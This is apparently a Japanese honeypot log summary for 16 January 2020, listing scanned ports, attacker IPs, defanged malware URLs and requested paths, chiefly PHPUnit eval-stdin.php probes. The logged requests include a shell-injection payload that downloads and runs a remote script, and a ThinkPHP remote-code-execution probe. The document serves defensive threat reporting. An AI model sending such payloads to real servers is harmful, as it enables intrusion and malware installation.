【ハニーポット簡易分析】Honeypot簡易分析(2020/1/16)
Honeypot簡易分析(2020/1/16)の簡易分析となります。
PHPUnitのスキャン行為を検知していました。
<Honeytrap>
Local Port Top 10
LocalPort Count
1433 481373 件
445 10878 件
3389 610 件
8080 175 件
5432 112 件
52869 83 件
139 65 件
81 62 件
Remote IP Top 10
RemoteIP Count
174[.]139[.]9[.]250 29893 件
190[.]216[.]135[.]202 29884 件
223[.]25[.]72[.]206 29852 件
93[.]76[.]248[.]42 29486 件
36[.]92[.]174[.]101 29374 件
36[.]80[.]153[.]253 23585 件
176[.]109[.]253[.]217 20581 件
180[.]242[.]169[.]30 20374 件
Malware Count
No Malware 502218 件
hxxp://51[.]77[.]213[.]109/mips 13 件
hxxp://91[.]92[.]66[.]124/ 5 件
hxxp://a46[.]bulehero[.]in/download[.]exe 3 件
hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 2 件
hxxp://167[.]172[.]217[.]87/EskDfbins[.]sh 1 件
hxxp://188[.]209[.]49[.]244/aa/arm7 1 件
<WOWHoneypot>
URI Path Top 10
URI Path Count
/ 35 件
/admin/assets/js/views/login[.]js 12 件
/admin/i18n/readme[.]txt 4 件
/recordings/theme/main[.]css 4 件
/admin/config[.]php 4 件
/[.]env 3 件
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//vendor/phpunit/phpunit/Util/PHP/eval-stdin[.]php 3 件
Remote IP Top 10
RemoteIP Count
157[.]7[.]190[.]241 60 件
77[.]247[.]108[.]77 16 件
176[.]117[.]190[.]185 9 件
77[.]247[.]108[.]119 8 件
58[.]87[.]104[.]18 4 件
34[.]207[.]135[.]139 2 件
45[.]83[.]67[.]121 1 件
105[.]247[.]130[.]190 1 件
All URI
URI Count
/ 35 件
/admin/assets/js/views/login[.]js 12 件
/admin/i18n/readme[.]txt 4 件
/recordings/theme/main[.]css 4 件
/admin/config[.]php 4 件
/[.]env 3 件
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//vendor/phpunit/phpunit/Util/PHP/eval-stdin[.]php 3 件
//vendor/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//vendor/phpunit/Util/PHP/eval-stdin[.]php 3 件
//phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//phpunit/phpunit/Util/PHP/eval-stdin[.]php 3 件
//phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//phpunit/Util/PHP/eval-stdin[.]php 3 件
//lib/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//lib/phpunit/phpunit/Util/PHP/eval-stdin[.]php 3 件
//lib/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//lib/phpunit/Util/PHP/eval-stdin[.]php 3 件
//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php 3 件
/shell?cd+/tmp;rm+-rf+[.]j;wget+hxxp:/\/91[.]92[.]66[.]124/[.][.]j/[.]j;chmod+777+[.]j;sh+[.]j;echo+DONE 2 件
/manager/html 1 件
ip[.]ws[.]126[.]net:443 1 件
/TP/public/index[.]php 1 件
/TP/public/index[.]php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 1 件
/TP/public/index[.]php?s=captcha 1 件
/manager/text/list 1 件
/clientaccesspolicy[.]xml 1 件
<WOWHoneypot(https)>
URI Path Top 10
URI Path Count
/ 45 件
/admin/assets/js/views/login[.]js 13 件
/admin/i18n/readme[.]txt 5 件
/recordings/theme/main[.]css 5 件
/admin/config[.]php 5 件
/rpc/rpcproxy[.]dll 1 件
Remote IP Top 10
RemoteIP Count
3[.]87[.]67[.]141 39 件
77[.]247[.]108[.]77 20 件
77[.]247[.]108[.]119 8 件
46[.]101[.]106[.]77 1 件
196[.]52[.]43[.]94 1 件
139[.]162[.]113[.]204 1 件
134[.]209[.]247[.]103 1 件
163[.]172[.]184[.]251 1 件
All URI
URI Count
/ 45 件
/admin/assets/js/views/login[.]js 13 件
/admin/i18n/readme[.]txt 5 件
/recordings/theme/main[.]css 5 件
/admin/config[.]php 5 件
/rpc/rpcproxy[.]dll?localhost:3388 1 件